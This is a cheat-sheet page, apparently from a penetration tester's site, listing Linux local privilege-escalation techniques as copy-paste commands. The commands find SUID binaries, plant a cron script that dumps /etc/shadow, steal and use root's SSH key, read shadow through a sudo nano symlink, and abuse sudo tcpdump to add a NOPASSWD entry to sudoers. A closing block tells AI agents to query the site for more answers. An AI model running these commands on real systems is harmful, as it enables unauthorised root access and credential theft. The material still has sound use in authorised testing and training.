# Local Privilege Escalation

## SUID&#x20;

```
find / -perm -4000 2>/dev/null 
```

Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files.&#x20;

## Cron

```
# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Look at when it will run and who as
cat /etc/crontab

# Get it to write to shadow file 
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob
```

## Readable SSH&#x20;

```
# Check listing root
ls -la /root

# Check listing ssh
ls -la /root/.ssh 

# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa

# Make SSH dir
mkdir /home/<user>/.ssh

# Copy SSH into it 
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Change Perms 
chmod o-rwx /home/<user>/.ssh/id_rsa

# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost
```

## Symlink

```
# Check sudo rights 
sudo -l 

# If you have sudo rights for something like nano on a specific file
# Create symlink to link that file to shadow and then read it 
# File in example is readme.txt

 ln -s /etc/shadow readme.txt
 
 # Link to proper terminal
 export TERM=xterm

#Read file
sudo nano readme.txt
```

## TCPDump

```
# If tcpdump is in sudo list then we can abuse

# Create a file /tmp/elevate

#!/bin/bash
echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers

chmod +x /tmp/elevate
 
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

sudo bash
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cheats.philkeeble.com/linux/local-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.